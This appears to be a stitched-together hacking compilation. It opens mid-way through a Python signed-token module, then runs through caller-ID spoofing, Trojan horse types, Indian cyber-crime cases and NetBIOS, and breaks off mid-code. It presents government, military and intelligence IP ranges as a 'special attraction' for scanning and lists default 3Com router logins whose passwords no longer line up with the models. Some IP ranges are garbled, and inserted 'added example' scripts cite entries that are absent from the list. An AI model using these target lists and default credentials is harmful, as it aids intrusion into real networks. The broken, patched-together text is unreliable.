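    return hmac.new(SECRET_KEY, f"{user}:{ts}".encode(), hashlib.sha256).hexdigest()


def issue_token(user: str, now: Optional[float] = None) -> str:
    """Mint 'user:timestamp:signature' once after a real login.
    Assumes user names never contain ':' (the field separator)."""
    if ":" in user:
        raise ValueError("user name must not contain ':'")
    ts = int(now if now is not None else time.time())
    return f"{user}:{ts}:{_sign(user, ts)}"


def token_allows(token: str, now: Optional[float] = None) -> bool:
    """Accept only a well-formed, unexpired token whose signature verifies.
    compare_digest keeps the signature comparison constant-time."""
    parts = token.split(":")
    if len(parts) != 3 or not parts[1].isdigit():
        return False
    user, ts, sig = parts[0], int(parts[1]), parts[2]
    if not hmac.compare_digest(_sign(user, ts), sig):
        return False
    current = now if now is not None else time.time()
    return 0 <= current - ts <= TOKEN_TTL


def authorize(headers: dict, now: Optional[float] = None) -> bool:
    """Gate for a protected resource: the token decides, the Referer is ignored."""
    return token_allows(headers.get("X-Access-Token", ""), now)
```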

Caller ID spoofing
In public telephone networks, it has for a long while been possible to find out who is calling you by looking at the Caller ID information that is transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and also with VoIP. Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity, and present false names and numbers, which could of course be used as a tool to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone on the planet, which makes the whole Caller ID information now next to useless. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country to the receiver, which means that it is very difficult to have a legal framework to control those who would use fake Caller IDs as part of a scam.


Trojan horse
Example of a simple Trojan horse
A simple example of a Trojan horse would be a program named "waterfalls.scr" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the victim's computer.

Types of Trojan horses
Trojan horses are almost always designed to do various harmful things, but could be harmless. They are classified based on how they breach systems and the damage they cause. The seven main types of Trojan horses are:
Remote Access Trojans
Data Sending Trojans
Destructive Trojans
Proxy Trojans
FTP Trojans
Security software disabler Trojans
Denial-of-service attack (DoS) Trojans
URL Trojans

A Trojan horse may be used for:
erasing or overwriting data on a computer;
encrypting files in a cryptoviral extortion attack;
corrupting files in a subtle way;
uploading and downloading files;
allowing remote access to the victim's computer (this is called a RAT, remote administration tool);
spreading other malware, such as viruses (in this case the Trojan horse is called a "dropper" or "vector");
setting up networks of zombie computers in order to launch DDoS attacks or send spam;
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware);
making screenshots;
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger);
phishing for bank or other account details, which can be used for criminal activities;
installing a backdoor on a computer system;
opening and closing the CD-ROM tray;
harvesting e-mail addresses and using them for spam;
restarting the computer whenever the infected program is started.

Some examples are:

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of Trojan horses. "Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Droppers
Droppers perform two tasks at once. A dropper performs a legitimate task but also installs a computer virus or a computer worm on a system or disk at the same time.

Precautions against Trojan horses


Trojan horses can be protected against through end-user awareness. Trojan horse viruses can cause a great deal of damage to a personal computer but even more damage to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan horse virus is hidden, it is harder to protect yourself or your company from it, but there are things that you can do. Trojan horses are most commonly spread through e-mail, much like other types of common viruses. The only difference, of course, is that a Trojan horse is hidden. The best ways to protect yourself and your company from Trojan horses are as follows:
1. If you receive e-mail from someone that you do not know or you receive an unknown attachment, never open it right away. As an e-mail user you should confirm the source. Some hackers have the ability to steal address books, so if you see e-mail from someone you know, it is not necessarily safe.
2. When setting up your e-mail client, make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free.
3. Make sure your computer has an anti-virus program on it and update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on; that way if you forget to update your software you can still be protected from threats.
4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan horses. Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches, your computer is kept much safer.
5. Avoid using peer-to-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella because they are generally unprotected from viruses, and Trojan horse viruses spread through them especially easily. Some of these programs do offer some virus protection, but this is often not strong enough. If you insist on using P2P, it would be safer not to download files that claim to be "rare" songs, books, movies, pictures, etc.
Besides these sensible precautions, one can also install anti-trojan software, some of which is offered free.

Methods of Infection
The majority of Trojan horse infections occur because the user was tricked into running an infected program. This is why it is advised not to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an instant message, downloaded from a website or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.
Websites: You can be infected by visiting a rogue website.
Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly.
Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide file-sharing capabilities such as instant messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured. A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.
Some modern trojans that arrive through instant messengers come in as a very important-looking message, but their executables are named the same as, or nearly the same as, Windows system processes such as 'Svchost.exe'. Some of these look-alike names are: Svchost32.exe, Svhost.exe, back.exe.
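A detection pass for the look-alike process names mentioned above, as an added Python example (not code from the original page): the reference table of genuine system processes, their expected directories and the sample process snapshot are constructed, and a real hunt would read the live process list instead.

```python
"""Flag running processes whose names imitate Windows system processes, or
whose genuine name runs from the wrong directory.

Added example, not from the original page.  The reference table and the
sample snapshot below are constructed for illustration.
"""
from typing import Dict, List, Tuple

# Constructed reference table: genuine names and the directory the real
# binary is expected to run from.
SYSTEM_PROCESSES: Dict[str, str] = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}

# Names within this many single-character edits of a genuine name are
# treated as imitations (svhost.exe is 1 edit away, svchost32.exe is 2).
MAX_EDITS = 2


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: insertions, deletions and substitutions cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify(name: str, directory: str) -> str:
    """Return 'ok', 'wrong-path' or 'lookalike' for one process entry."""
    n = name.lower()
    d = directory.lower().rstrip("\\")
    if n in SYSTEM_PROCESSES:
        # Right name: only the location can give it away.
        return "ok" if d == SYSTEM_PROCESSES[n] else "wrong-path"
    for real in SYSTEM_PROCESSES:
        if edit_distance(n, real) <= MAX_EDITS:
            return "lookalike"
    return "ok"


def suspicious(processes: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Run classify over (name, directory) pairs and keep the findings."""
    findings = []
    for name, directory in processes:
        verdict = classify(name, directory)
        if verdict != "ok":
            findings.append((name, directory, verdict))
    return findings


# Constructed process snapshot, including the two look-alike names the text lists.
SAMPLE_PROCESSES: List[Tuple[str, str]] = [
    ("svchost.exe", r"C:\Windows\System32"),
    ("svchost32.exe", r"C:\Users\alice\AppData\Local\Temp"),
    ("svhost.exe", r"C:\Windows"),
    ("svchost.exe", r"C:\Users\alice\Downloads"),   # genuine name, wrong location
    ("notepad.exe", r"C:\Windows\System32"),
]

if __name__ == "__main__":
    for name, directory, verdict in suspicious(SAMPLE_PROCESSES):
        print(f"{verdict:10s} {name} ({directory})")
```

Edit distance alone will not catch an unrelated name such as back.exe; pairing the name check with the path check and a signature check on the binary closes more of that gap.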

Well-known trojan horses

Back Orifice
Back Orifice 2000
NetBus
SubSeven (Sub7)
Downloader-EV
Pest Trap
AIDS
Beast Trojan
Bifrose
Optix Pro
Poison Ivy
ProRat
EGABTR
RemoteHAK

Introduction to Cyber Crime


The first recorded cyber crime took place in the year 1820! That is not surprising considering the fact that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. The era of modern computers, however, began with the analytical engine of Charles Babbage. In 1820, Joseph-Marie Jacquard, a textile manufacturer in France, produced the loom. This device allowed the repetition of a series of steps in the weaving of special fabrics. This resulted in a fear amongst Jacquard's employees that their traditional employment and livelihood were being threatened. They committed acts of sabotage to discourage Jacquard from further use of the new technology. This is the first recorded cyber crime! Today computers have come a long way, with neural networks and nano-computing promising to turn every atom in a glass of water into a computer capable of performing a billion operations per second. Cyber crime is an evil having its origin in the growing dependence on computers in modern life. In a day and age when everything from microwave ovens and refrigerators to nuclear power plants is being run on computers, cyber crime has assumed rather sinister implications. Major cyber crimes in the recent past include the Citibank rip-off. US $10 million were fraudulently transferred out of the bank and into a bank account in Switzerland. A Russian hacker group led by Vladimir Levin, a renowned hacker, perpetrated the attack. The group compromised the bank's security systems. Vladimir was allegedly using his office computer at AO Saturn, a computer firm in St. Petersburg, Russia, to break into Citibank computers. He was finally arrested at Heathrow airport on his way to Switzerland.

Defining Cyber Crime


At the outset, let us satisfactorily define "cyber crime" and differentiate it from "conventional crime". Computer crime can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also given birth to a gamut of new-age crimes that are addressed by the Information Technology Act, 2000. Defining cyber crimes as "acts that are punishable by the Information Technology Act" would be unsuitable, as the Indian Penal Code also covers many cyber crimes, such as email spoofing, cyber defamation, sending threatening emails etc. A simple yet robust definition of cyber crime would be "unlawful acts wherein the computer is either a tool or a target or both". Let us examine the acts wherein the computer is a tool for an unlawful act. This kind of activity usually involves a modification of a conventional crime by using computers. Some examples are:

Financial crimes
This would include cheating, credit card frauds, money laundering etc. To cite a recent case, a website offered to sell Alphonso mangoes at a throwaway price. Distrusting such a transaction, very few people responded to or supplied the website with their credit card numbers. These people were actually sent the Alphonso mangoes. The word about this website now spread like wildfire. Thousands of people from all over the country responded and ordered mangoes by providing their credit card numbers. The owners of what was later proven to be a bogus website then fled taking the numerous credit card numbers and proceeded to spend huge amounts of money much to the chagrin of the card owners.

Cyber pornography

This would include pornographic websites; pornographic magazines produced using computers (to publish and print the material) and the Internet (to download and transmit pornographic pictures, photos, writings etc). Recent Indian incidents revolving around cyber pornography include the Air Force Balbharati School case. A student of the Air Force Balbharati School, Delhi, was teased by all his classmates for having a pockmarked face. Tired of the cruel jokes, he decided to get back at his tormentors. He scanned photographs of his classmates and teachers, morphed them with nude photographs and put them up on a website that he uploaded on to a free web hosting service. It was only after the father of one of the class girls featured on the website objected and lodged a complaint with the police that any action was taken. In another incident, in Mumbai a Swiss couple would gather slum children and then would force them to appear for obscene photographs. They would then upload these photographs to websites specially designed for paedophiles. The Mumbai police arrested the couple for pornography.

Sale of illegal articles


This would include the sale of narcotics, weapons, wildlife etc. by posting information on websites, auction websites and bulletin boards, or simply by using email communication. For example, many of the auction sites, even in India, are believed to be selling cocaine in the name of 'honey'.

Online gambling
There are millions of websites, all hosted on servers abroad, that offer online gambling. In fact, it is believed that many of these websites are actually fronts for money laundering.

Intellectual Property crimes


These include software piracy, copyright infringement, trademarks violations, theft of computer source code etc.

Email spoofing
A spoofed email is one that appears to originate from one source but actually has been sent from another source. For example, Pooja has an e-mail address pooja@asianlaws.org. Her enemy, Sameer, spoofs her e-mail and sends obscene messages to all her acquaintances. Since the emails appear to have originated from Pooja, her friends could take offence and relationships could be spoiled for life. Email spoofing can also cause monetary damage. In an American case, a teenager made millions of dollars by spreading false information about certain companies whose shares he had short sold. This misinformation was spread by sending spoofed emails, purportedly from news agencies like Reuters, to share brokers and investors, who were informed that the companies were doing very badly. Even after the truth came out the values of the shares did not go back to the earlier levels and thousands of investors lost a lot of money.

Forgery
Counterfeit currency notes, postage and revenue stamps, mark sheets etc. can be forged using sophisticated computers, printers and scanners. Outside many colleges across India, one finds touts soliciting the sale of fake mark sheets or even certificates. These are made using computers and high-quality scanners and printers. In fact, this has become a booming business involving thousands of rupees being given to student gangs in exchange for these bogus but authentic-looking certificates.

Cyber Defamation

This occurs when defamation takes place with the help of computers and/or the Internet. For example, someone publishes defamatory matter about someone on a website or sends emails containing defamatory information to all of that person's friends. In a recent occurrence, Surekha (names of people have been changed), a young girl, was about to be married to Suraj. She was really pleased because, despite it being an arranged marriage, she had liked the boy. He had seemed to be open-minded and pleasant. Then, one day when she met Suraj, he looked worried and even a little upset. He was not really interested in talking to her. When asked, he told her that members of his family had been receiving e-mails that contained malicious things about Surekha's character. Some of them spoke of affairs which she had had in the past. He told her that his parents were justifiably very upset and were also considering breaking off the engagement. Fortunately, Suraj was able to prevail upon his parents and the other elders of his house to approach the police instead of blindly believing what was contained in the mails. During investigation, it was revealed that the person sending those e-mails was none other than Surekha's stepfather. He had sent these emails so as to break up the marriage. The girl's marriage would have caused him to lose control of her property, of which he was the guardian till she got married. Another famous case of cyber defamation occurred in America. All friends and relatives of a lady were beset with obscene e-mail messages appearing to originate from her account. These mails were giving the lady in question a bad name among her friends. The lady was an activist against pornography. In reality, a group of people displeased with her views and angry with her for opposing them had decided to get back at her by using such underhanded methods. In addition to sending spoofed obscene e-mails they also put up websites about her that basically maligned her character, and sent e-mails to her family and friends containing matter defaming her.

Cyber stalking
The Oxford dictionary defines stalking as "pursuing stealthily". Cyber stalking involves following a person's movements across the Internet by posting messages (sometimes threatening) on the bulletin boards frequented by the victim, entering the chat rooms frequented by the victim, constantly bombarding the victim with emails etc.

Index

IP Address
Default Router Password
NetBIOS
Mobile Hacking

Special attraction
Government, military and intelligence IP ranges.

USCENTAF/SCM USCENTAF/SCM USCENTAF/SCM USCENTAF/SCM USCENTAF/SCM 79

153.31.0.0 RANGE 155 155.5.0.0 155.6.0.0 155.77.0.0 155.78.0.0 155.79.0.0 155.80.0.0 155.81.0.0 155.82.0.0 155.83.0.0 155.84.0.0 155.85.0.0 155.86.0.0 155.87.0.0 155.88.0.0 155.96.0.0 155.149.0.0 155.155.0.0 155.178.0.0 155.213.0.0 155.214.0.0 155.215.0.0 155.216.0.0 155.217.0.0 155.218.0.0 155.219.0.0 155.220.0.0 155.221.0.0 RANGE 156 156.9.0.0

Federal Bureau of Investigation

1141st Signal Bn 1141st Signal Bn PEO STAMIS PEO STAMIS US Army Corps of Engineers PEO STAMIS PEO STAMIS PEO STAMIS US Army Corps of Enginers PEO STAMIS PEO STAMIS US Army Corps of Engineers PEO STAMIS PEO STAMIS Drug Enforcement Administration 1112th Signal Battalion HQ, 5th Signal Command \ Federal Aviation Administration USAISC Fort Benning Director of Information Management USAISC-FT DRUM TCACCIS Project Management Office Directorate of Information Management USAISC DOIM/USAISC Fort Sill USAISC-DOIM USAISC-Ft Ord

U. S. Marshals Service 80

RANGE 158 158.1.0.0 58.2.0.0 158.3.0.0 158.6.0.0 158.8.0.0 158.9.0.0 158.10.0.0 158.11.0.0 158.12.0.0 158.13.0.0 158.14.0.0 158.16.0.0 158.17.0.0 158.18.0.0 158.19.0.0 158.20.0.0 158.235.0.0 158.243.0.0 158.244.0.0 158.245.0.0 158.246.0.0 RANGE 159 159.120.0.0 Naval Air Systems Command (Air 4114) Commander, Tooele Army Depot USAMC Logistics Support Activity U.S. Army TACOM USAISC-Ft. McCoy US Army Soldier Support Center USAISC-CECOM GOC UASISC-Vint Hill US Army Harry Diamond Laboratories USAISC DOIM 1112th Signal Battalion Rocky Mountain Arsenal (PMRMA) Crane Army Ammunition Activity Defense Finance & Accounting Service Center DOIM DOIM Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity

RANGE 160 160.132.0.0 |160.135.0.0 160.138.0.0 160.139.0.0 160.140.0.0 160.143.0.0 US Army Recruiting Command 36th Signal BN USAISC USAISC HQ, United States Army USAISC 81

160.145.0.0 160.146.0.0 160.150.0.0 RANGE 161 161.124.0.0 RANGE 162 162.32.0.0 162.45.0.0 162.46.0.0 RANGE 163 163.205.0.0 163.206.0.0 RANGE 164 164.45.0.0 164.49.0.0 164.158.0.0 164.217.0.0 164.223.0.0 164.224.0.0 164.225.0.0 164.226.0.0 164.227.0.0 164.228.0.0 164.229.0.0 164.230.0.0 164.231.0.0

1101st Signal Brigade USAISC SATCOMSTA-CAMP ROBERTS Commander, Moncrief Army Hospital

NAVAL WEAPONS STATION

Naval Aviation Depot Pensacola Central Intelligence Agency Central Intelligence Agency |

NASA Kennedy Space Center NASA Kennedy Space Center

Naval Ordnance Center, Pacific Division United States Army Space and Strategic Defense Naval Surface Warfare Center Institute for Defense Analyses Naval Undersea Warfare Center \ Secretary of the Navy U.S. Army Intelligence and Security Command Naval Exchange Service Command Naval Surface Warfare Center, Crane Division USCINCPAC J21T NCTS-NOLA Naval Aviation Depot Military Sealift Command

RANGE 167 167.44.0.0 Government Telecommunications Agency 82

RANGE 168 168.68.0.0 168.85.0.0 168.102.0.0 USDA Office of Operations Fort Sanders Alliance Indiana Purdue Fort Wayne

RANGE 169 169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 195 195.10.* Various - Do not scan RANGE 199 199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA RANGE 203 203.59.0.0 - 203.59.255.255 Perth Australia iiNET RANGE 205 205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR 205.96.* - 205.103.* RANGE 207 207.30.* Sprint/United Telephone of Florida
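A scope filter that consumes this list, added here as an example; it is not part of the original page. It assumes the list's own conventions: a bare address such as 139.31.0.0 stands for the whole /16, a wildcard such as 139.124.* or 205.96.* covers the omitted octets, and two tokens joined by a dash are an inclusive range. The embedded sample is a constructed excerpt of the entries above, and the CIDR output is meant to be fed to a scanner's exclude option (nmap --exclude, for instance).

```python
"""Scope filter for a "do not scan" range list in the format used above.

Added example, not from the original page.  Tokens are interpreted as the
list writes them: trailing '*' or '0' octets are the host part, so 139.31.0.0
is a /16, 199.121.4.0 is a /24 and 205.96.* is 205.96.0.0/16; "A - B" is the
inclusive span from the first address of A to the last address of B.
"""
import ipaddress
import re
from typing import List, Tuple

AddrRange = Tuple[ipaddress.IPv4Address, ipaddress.IPv4Address]

# First token on a line, optionally " - " and a second token; the registrant's
# name that follows is ignored.  Lines that start with anything else are skipped.
_LINE = re.compile(r"^\s*([\d.*]+)(?:\s*-\s*([\d.*]+))?")

# Constructed excerpt using entries that appear in the list above.
SAMPLE_LIST = """
RANGE 139
139.31.0.0 20th Tactical Fighter Wing
139.124.* Reseau Informatique
RANGE 169
169.252.0.0 - 169.253.0.0 U.S. Department of State
RANGE 195
195.10.* Various - Do not scan
RANGE 199
199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA
RANGE 205
205.96.* - 205.103.*
207.30.* Sprint/United Telephone of Florida
"""


def _block(token: str) -> ipaddress.IPv4Network:
    """Turn one token into the network it denotes (see module docstring)."""
    parts = token.split(".")
    if parts and parts[-1] == "*":           # 205.96.* -> 205.96.*.*
        parts += ["*"] * (4 - len(parts))
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {token!r}")
    host_octets = 0
    for part in reversed(parts):
        if part not in ("*", "0"):
            break
        host_octets += 1
    address = ".".join("0" if p == "*" else p for p in parts)
    return ipaddress.IPv4Network((address, 32 - 8 * host_octets))


def parse_exclusions(text: str) -> List[AddrRange]:
    """Inclusive (first, last) pairs for every address line in `text`."""
    ranges: List[AddrRange] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m or not any(c.isdigit() for c in m.group(1)):
            continue                          # blank, "RANGE nnn" or name-only line
        first = _block(m.group(1)).network_address
        last = _block(m.group(2) or m.group(1)).broadcast_address
        if last < first:
            raise ValueError(f"reversed range: {line.strip()!r}")
        ranges.append((first, last))
    return ranges


def is_excluded(target: str, ranges: List[AddrRange]) -> bool:
    ip = ipaddress.IPv4Address(target)
    return any(first <= ip <= last for first, last in ranges)


def filter_targets(targets, ranges: List[AddrRange]):
    """Split candidate targets into (in_scope, excluded) lists."""
    in_scope, excluded = [], []
    for t in targets:
        (excluded if is_excluded(t, ranges) else in_scope).append(t)
    return in_scope, excluded


def to_cidrs(ranges: List[AddrRange]) -> List[str]:
    """Collapse the pairs into the minimal CIDR list, e.g. for `nmap --exclude`."""
    nets = []
    for first, last in ranges:
        nets.extend(ipaddress.summarize_address_range(first, last))
    return [str(n) for n in ipaddress.collapse_addresses(nets)]


if __name__ == "__main__":
    rules = parse_exclusions(SAMPLE_LIST)
    ok, skipped = filter_targets(["8.8.8.8", "139.31.200.7", "205.100.3.4"], rules)
    print("in scope:", ok)
    print("excluded:", skipped)
    print("--exclude " + ",".join(to_cidrs(rules)))
```

Ranges are kept as inclusive address pairs rather than networks because an entry such as 199.121.4.0 - 199.121.253.0 is not a single CIDR block; summarize_address_range produces the minimal CIDR set only when a scanner needs one.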


Default Router Password


Manufacturer: 3Com (every row in this table)

Model / OS version / Login, as listed:
  (model not given) / 1.25 / root
  Super Stack 2 Switch / Any / manager
  AccessBuilder 7000 BRI / Any
  CoreBuilder 2500
  Switch 3000/3300 / manager
  Switch 3000/3300 / admin
  Switch 3000/3300 / security
  Cable Management System SQL Database (DOCSIS DHCP) / Win2000 & MS SQL / DOCSIS_APP
  NAC (Network Access Card) v4.1.x / adm
  HiPer ARC Card v4.1.x / adm
  CoreBuilder 6000 / debug
  CoreBuilder 7000 / tech
  SuperStack II Switch 2200 / debug
  SuperStack II Switch 2700 / tech
  SuperStack / CoreBuilder / admin
  SuperStack / CoreBuilder / read
  SuperStack / CoreBuilder / write
  LinkSwitch and CellPlex / tech
  LinkSwitch and CellPlex / debug
  Superstack II 3300FX / admin
  Switch 3000/3300 / Admin
  CellPlex 7000 / tech
  Switch 3000/3300 / monitor
  AirConnect Access Point / n/a
  Superstack II Dual Speed 500 / security
  OfficeConnect 5x1 / at least 5.x
  SuperStack 3 Switch 3300XM / admin
  Super Stack 2 Switch / Any / manager
  SuperStack II Switch 1100 / manager
  SuperStack II Switch 1100 / security
  Super Stack 2 Switch / any / manager
  OfficeConnect Remote 812 / root
  Switch 3000/3300 / admin
  OCR-812 / root
  NBX100 2.8 / administrator
  Home Connect / User

Password column, as listed: letmein, manager, manager, admin, security, 3com, none, none, tech, tech, synnet, tech, tech, synnet, 3com, tech, monitor, comcomcom, security, PASSWORD, manager, manager, security, manager, !root, admin, !root, 0000, Password, -


Understanding NetBIOS
What is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services. NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as the network controller for IBM's PC Network LAN. It has since been extended so that programs written to the NetBIOS interface can operate on the IBM Token Ring architecture, and it has been adopted as an industry standard; it is now common to refer to NetBIOS-compatible LANs. It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependency. It also spares software developers the task of developing network error recovery and low-level message addressing or routing; the NetBIOS interface does much of this work for them. NetBIOS standardizes the interface between applications and a LAN's operating capabilities. With this, it can be specified which levels of the OSI model the application writes to, making the application portable to other networks.

In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various ways; these names are discussed in more detail below. PCs on a NetBIOS LAN communicate either by establishing a session or by using the NetBIOS datagram or broadcast methods. Sessions allow larger messages to be sent and handle error detection and correction; the communication is one-to-one. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size, and there is no error detection or correction. Datagram communication does, however, allow two machines to communicate without establishing a session.

All communication in these environments is presented to NetBIOS in a format called the Network Control Block (NCB). Allocation of these blocks in memory is the responsibility of the user program. Each NCB is divided into fields, reserved for input and output respectively. NetBIOS is a very common protocol in today's environments and is supported on Ethernet, Token Ring and IBM PC Network. In its original form it was defined only as an interface between the application and the network adapter; transport-like functions have since been added, making it more functional over time. NetBIOS supports both connection-oriented communication (carried over TCP when run on TCP/IP) and connectionless communication (carried over UDP), supports broadcasts and multicasting, and provides three distinct services: Naming, Session and Datagram.

NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means. A NetBIOS name can consist of up to 16 alphanumeric characters, and the combination of characters must be unique within the entire source-routing network. Before a PC that uses NetBIOS can fully function on a network, it must register its NetBIOS name. When a client becomes active, it advertises its name; a client is considered registered when it can successfully advertise itself without any other client claiming the same name. The registration process is as follows:

1. Upon boot-up, the client broadcasts its NetBIOS name and information, anywhere from 6 to 10 times, to ensure every other client on the network receives it.
2. If another client on the network already has the name, that client issues its own broadcast to indicate that the name is in use. The client trying to register the name already in use stops all attempts to register it.
3. If no other client on the network objects to the registration, the client finishes the registration process.

There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique, and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.

The NetBIOS naming convention allows 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft networking software to identify the functionality installed or the registered device or service.

[QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138 and 139. Port 137 is the NetBIOS name service (UDP). Port 138 is the NetBIOS datagram service (UDP). Port 139 is the NetBIOS session service (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above.]

The following table lists the NetBIOS suffixes currently used by Microsoft Windows NT. Suffixes are shown in hexadecimal.

Name                  Number  Type  Usage
==================================================================
<computername>         00      U    Workstation Service
<computername>         01      U    Messenger Service
<\\_MSBROWSE_>         01      G    Master Browser
<computername>         03      U    Messenger Service
<computername>         06      U    RAS Server Service
<computername>         1F      U    NetDDE Service
<computername>         20      U    File Server Service
<computername>         21      U    RAS Client Service
<computername>         22      U    Exchange Interchange
<computername>         23      U    Exchange Store
<computername>         24      U    Exchange Directory
<computername>         30      U    Modem Sharing Server Service
<computername>         31      U    Modem Sharing Client Service
<computername>         43      U    SMS Client Remote Control
<computername>         44      U    SMS Admin Remote Control Tool
<computername>         45      U    SMS Client Remote Chat
<computername>         46      U    SMS Client Remote Transfer
<computername>         4C      U    DEC Pathworks TCPIP Service
<computername>         52      U    DEC Pathworks TCPIP Service
<computername>         87      U    Exchange MTA
<computername>         6A      U    Exchange IMC
<computername>         BE      U    Network Monitor Agent
<computername>         BF      U    Network Monitor Apps
<username>             03      U    Messenger Service
<domain>               00      G    Domain Name
<domain>               1B      U    Domain Master Browser
<domain>               1C      G    Domain Controllers
<domain>               1D      U    Master Browser
<domain>               1E      G    Browser Service Elections
<INet~Services>        1C      G    Internet Information Server
<IS~Computer_name>     00      U    Internet Information Server
<computername>         [2B]    U    Lotus Notes Server
IRISMULTICAST          [2F]    G    Lotus Notes
IRISNAMESERVER         [33]    G    Lotus Notes
Forte_$ND800ZA         [20]    U    DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but because of multiple network interfaces on the same computer this configuration is necessary to permit the registration. The maximum number of addresses is 25.
Internet Group (I): A special configuration of the group name used to manage Windows NT domain names.
Domain Name (D): New in NT 4.0.

For a quick and dirty look at a server's registered NetBIOS names and services, issue the following NBTSTAT command:
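The following is an added example, not code from the rhino9 paper or the original page: a pure-Python builder for the node-status query that nbtstat -A sends to UDP port 137, and a decoder for the answer that applies the suffix table above to each registered name and reads the unique/group bit from the name flags. Packet layout follows RFC 1001/1002. The response it decodes is constructed inline (the host name WORKSTATION1, the domain CORPDOMAIN and the MAC address are invented); sending the same query to a real host is a socket sendto/recvfrom on port 137 against the bytes build_node_status_query returns.

```python
"""NetBIOS Name Service (UDP/137) node-status query builder and decoder.

Added example, not part of the original text.  `nbtstat -A <ip>` sends an
NBSTAT query for the wildcard name "*"; the reply carries the remote name
table.  Each entry is a 15-byte name, a 1-byte suffix and 2 flag bytes whose
top bit marks a group name.  The sample response below is constructed.
"""
import struct
from typing import Dict, List, Tuple

NBSTAT = 0x0021        # node status record type (RFC 1002)
IN_CLASS = 0x0001

# Suffix -> service, from the Microsoft table above (selected rows).
SUFFIX_SERVICE: Dict[int, str] = {
    0x00: "Workstation Service (unique) / Domain Name (group)",
    0x01: "Messenger Service (unique) / Master Browser (__MSBROWSE__ group)",
    0x03: "Messenger Service",
    0x06: "RAS Server Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers (group)",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections (group)",
    0x20: "File Server Service",
    0xBE: "Network Monitor Agent",
    0xBF: "Network Monitor Application",
}


def encode_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 14.1): pad to 15 bytes, append the
    suffix, then emit each byte as two nibbles offset from 'A' (0x41)."""
    pad = b"\x00" if name == "*" else b" "           # the wildcard is NUL padded
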